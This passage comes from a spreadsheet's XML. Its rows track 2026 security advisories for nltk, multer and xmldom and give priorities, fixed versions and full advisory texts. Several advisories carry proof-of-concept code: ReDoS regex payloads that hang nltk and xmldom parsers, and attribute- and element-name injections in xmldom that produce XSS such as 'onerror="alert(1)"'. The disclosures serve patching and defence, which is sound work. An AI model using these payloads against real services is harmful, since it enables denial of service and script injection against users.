          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80205</t>
        </is>
      </c>
      <c r="D1050" s="5" t="inlineStr"/>
      <c r="E1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1050" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1050" s="5" t="inlineStr"/>
      <c r="R1050" s="5" t="inlineStr"/>
      <c r="S1050" s="5" t="inlineStr">
        <is>
          <t>### Summary
NLTK's `Text.findall()` and `TokenSearcher.findall()` methods accept user-supplied regular expressions and pass them to the Python `re` engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the `nltk.text` module and was resolved in a prior commit.
### Affected Code
`nltk/text.py` — `TokenSearcher.findall()` (line 255) / `Text.findall()` (line 620)
`TokenSearcher.__init__` builds an internal string by wrapping each token in angle brackets. The `findall()` method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:
```python
def findall(self, regexp):
    # Preprocessing does NOT prevent catastrophic backtracking
    regexp = re.sub(r"\s", "", regexp)
    regexp = re.sub(r"&lt;", "(?:&lt;(?:", regexp)
    regexp = re.sub(r"&gt;", ")&gt;)", regexp)
    regexp = re.sub(r"(?&lt;!\\)\.", "[^&gt;]", regexp)
    # User-controlled regexp executed with no timeout
    hits = re.findall(regexp, self._raw)
```
The preprocessing transforms `&lt;` and `&gt;` angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.
### Proof of Concept
```python
import nltk
import time
# Token of 25 'a' characters produces self._raw = "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;"
# The trailing '!' ensures no match, forcing full backtracking.
text = nltk.Text(["a" * 25 + "!"])
# Pattern after transformation:
#   &lt;  →  (?:&lt;(?:
#   &gt;  →  )&gt;)
# Becomes: (?:&lt;(?:((a+)+)b)&gt;)
# re.findall runs this against "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;" — hangs.
start = time.time()
text.findall(r"&lt;((a+)+)b&gt;")   # Never returns
```
### Impact
Applications that expose `Text.findall()` to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.
### Remediation
This vulnerability was patched in commit `d8e4753`. Users should update to the patched version.
### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t>
        </is>
      </c>
      <c r="T1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80206</t>
        </is>
      </c>
      <c r="D1051" s="5" t="inlineStr"/>
      <c r="E1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1051" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1051" s="5" t="inlineStr"/>
      <c r="R1051" s="5" t="inlineStr"/>
      <c r="S1051" s="5" t="inlineStr">
        <is>
          <t>### Summary
The NLTK `tgrep` module accepts user-supplied regular expressions and passes them to the Python `re` engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the `tgrep` API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.
### Affected Code
`nltk/tgrep.py` — `_tgrep_node_action()` (around line 320)
When a tgrep pattern contains a `/regex/` node, `_tgrep_node_action` compiles the embedded regex literal directly with no validation:
```python
def _tgrep_node_action(_s, _l, tokens):
    ...
    elif tokens[0].startswith("/"):
        assert tokens[0].endswith("/")
        node_lit = tokens[0][1:-1]
        return (
            lambda r: lambda n, m=None, l=None: r.search(
                _tgrep_node_literal_value(n)
            )
        )(re.compile(node_lit))  # User regex compiled and executed with no timeout
```
The compiled regex is applied against every matching tree node label via `r.search(...)`. A caller reaching this path via `tgrep_positions()` or `tgrep_compile()` controls `node_lit` entirely.
### Proof of Concept
```python
import nltk
from nltk.tgrep import tgrep_positions
# Root node label is 25 'a' characters.
# tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a")
# No 'b' is present — exponential backtracking occurs.
tree = nltk.Tree.fromstring("(" + "a" * 25 + " (NP (DT the)))")
tgrep_positions(r"/((a+)+)b/", [tree])   # Never returns
```
### Working Poc
The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgrep_positions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.
```python
import nltk
from nltk.tgrep import tgrep_positions
import time
def test_n(n):
    tree = nltk.Tree.fromstring("(" + "a" * n + " (NP (DT the)))")
    pattern = r"/((a+)+)b/"
    start = time.perf_counter()
    list(tgrep_positions(pattern, [tree]))
    return time.perf_counter() - start
if __name__ == "__main__":
    # Adjust the range if needed – these values complete quickly
    n_values = [18, 20, 22, 24, 26, 28]
    print(f"Testing n = {n_values}\n")
    times = []
    for n in n_values:
        t = test_n(n)
        times.append((n, t))
        print(f"n={n:2d} done", flush=True)
    print("\n--- Increase factors (per step in n) ---")
    factors = []
    for i in range(1, len(times)):
        prev_n, prev_t = times[i-1]
        curr_n, curr_t = times[i]
        factor = curr_t / prev_t
        factors.append((curr_n, factor))
        print(f"n={curr_n:2d} : factor = {factor:.2f}x  (vs n={prev_n})")
    avg = sum(f for _, f in factors) / len(factors)
    print(f"\nAverage factor: {avg:.2f}x")
    print("\n✅ Confirmed: exponential growth (catastrophic backtracking).")
    print("   Larger n (≥ 35) will hang indefinitely.")
```
When run, the output shows a clear exponential increase (factor &gt; 3.0 per +2 in n), proving the vulnerability.
### Impact
In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.
### Remediation
This issue remains unfixed in versions `&lt;= 3.10.2`. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.
### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t>
        </is>
      </c>
      <c r="T1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82333</t>
        </is>
      </c>
      <c r="D1052" s="5" t="inlineStr"/>
      <c r="E1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1052" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1052" s="5" t="inlineStr"/>
      <c r="R1052" s="5" t="inlineStr"/>
      <c r="S1052" s="5" t="inlineStr">
        <is>
          <t>### Impact
multer is vulnerable to a Denial of Service (DoS) via a crafted array index in multipart field names. The `append-field` dependency parses bracket notation in field names, and a large numeric index such as `items[4294967294]` forces allocation of a maximum-length sparse array. A following field with a non-numeric key on the same base then converts that array to an object by iterating its full length, which consumes CPU synchronously and leaves the process unable to handle other requests. A single HTTP request with a crafted multipart body is sufficient to exploit this, and it affects multer 1.x and 2.x.
### Patches
Users should upgrade to `2.3.0` and configure `limits.fieldArrayIndexLimit` to the minimum array index their application requires.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="D1053" s="5" t="inlineStr"/>
      <c r="E1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1053" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1053" s="5" t="inlineStr"/>
      <c r="R1053" s="5" t="inlineStr"/>
      <c r="S1053" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.
## Details
`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.
The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:
- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).
The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.
### Root Cause
1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);
// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```
### Demonstrating the validation gap
```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}
// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```
## Impact
Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:
- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.
`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).
Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.
### PoC — fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;
// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```
### Why the default stays verbatim
The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.
Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t>
        </is>
      </c>
      <c r="T1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="D1054" s="5" t="inlineStr"/>
      <c r="E1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1054" s="5" t="inlineStr">
        <is>
          <t>0.9.11</t>
        </is>
      </c>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1054" s="5" t="inlineStr"/>
      <c r="R1054" s="5" t="inlineStr"/>
      <c r="S1054" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).
## Details
The PI production in `lib/grammar.js` compiles (flags `mu`) to:
```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```
- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261
In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.
The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:
- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879
## Affected Versions
Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.
The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)
| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |
## Proof of Concept
```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```
Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):
| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.
## Fix Applied
Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).
PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:
```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```
The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t>
        </is>
      </c>
      <c r="T1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="D1055" s="5" t="inlineStr"/>
      <c r="E1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1055" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1055" s="5" t="inlineStr"/>
      <c r="R1055" s="5" t="inlineStr"/>
      <c r="S1055" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.
An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.
## Details
`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.
The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.
### Root Cause
1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);
// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```
## Impact
Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:
- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.
`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.
Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.
### PoC — fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```
### Why the default stays verbatim
The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.
Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t>
        </is>
      </c>
      <c r="T1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="D1056" s="5" t="inlineStr"/>
      <c r="E1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1056" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1056" s="5" t="inlineStr"/>
      <c r="R1056" s="5" t="inlineStr"/>
      <c r="S1056" s="5" t="inlineStr">
        <is>
          <t>## Summary
The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
